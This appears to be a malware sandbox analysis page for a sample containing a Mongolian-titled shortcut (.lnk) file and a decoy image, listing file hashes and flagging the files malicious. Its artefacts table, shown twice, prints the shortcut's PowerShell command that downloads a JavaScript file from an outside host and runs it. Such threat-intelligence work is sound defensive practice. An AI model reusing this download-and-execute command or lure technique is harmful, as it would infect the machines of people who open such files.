General
Structural Analysis
Config.0
Yara Rules5
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 497c1ad79c4ef5425eb8a7e4f49efc8b
|
| Sha1 | 01185318828ce07905ca20b8d8601284c258b1e8
|
| Sha256 | 84378b3e87ca6b472847bf4a6a7a6d171b2d8159573a6225925aab89617e74cc
|
| Sha384 | e95e13de6a12d3657d4b033a2f71f043f6c74e8172215b4c6bc4e40180ef77ea540603634a736d673ea9ad75eaf6f122
|
| Sha512 | 75731c1367915925f4ec43d3586e1b18c5930d67fb9adf7869817be2750effb3631c9969963deb6e8a2042952469bc0ab7c88067654693a8c2e4b9174209f92d
|
| SSDeep | 3072:0+mII23WU02AvjKmaqnQgjzIrrhlLAKleh7l3vP9FRcH9:0+lAKePIrHWhB339FA
|
| TLSH | 25E31239F9C13357EDC508CA13D194D6592C7899702B62139CFAE58E9D3E8AA38B4C0F
|
File Structure
497c1ad79c4ef5425eb8a7e4f49efc8b
Malicious
Хятад улстай хамтын ажиллагаагаа өргөжүүлэх төсөл.lnk
Malicious
[Lnk Summary]
Malicious
Мон-Атом ХХК.jpg
Мон-Атом ХХК.jpg-preview.png
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe "cd $ENV:Temp;$f=$ENV:Temp+'\f.js';Invoke-WebRequest 'https://filebulldogs.com/uploads/F1OQY9GU84/f.js' -OutFile $f;./f.js;" |
497c1ad79c4ef5425eb8a7e4f49efc8b (152.03 KB)
File Structure
497c1ad79c4ef5425eb8a7e4f49efc8b
Malicious
Хятад улстай хамтын ажиллагаагаа өргөжүүлэх төсөл.lnk
Malicious
[Lnk Summary]
Malicious
Мон-Атом ХХК.jpg
Мон-Атом ХХК.jpg-preview.png
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe "cd $ENV:Temp;$f=$ENV:Temp+'\f.js';Invoke-WebRequest 'https://filebulldogs.com/uploads/F1OQY9GU84/f.js' -OutFile $f;./f.js;" Malicious |
497c1ad79c4ef5425eb8a7e4f49efc8b > Хятад улстай хамтын ажиллагаагаа өргөжүүлэх төсөл.lnk |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.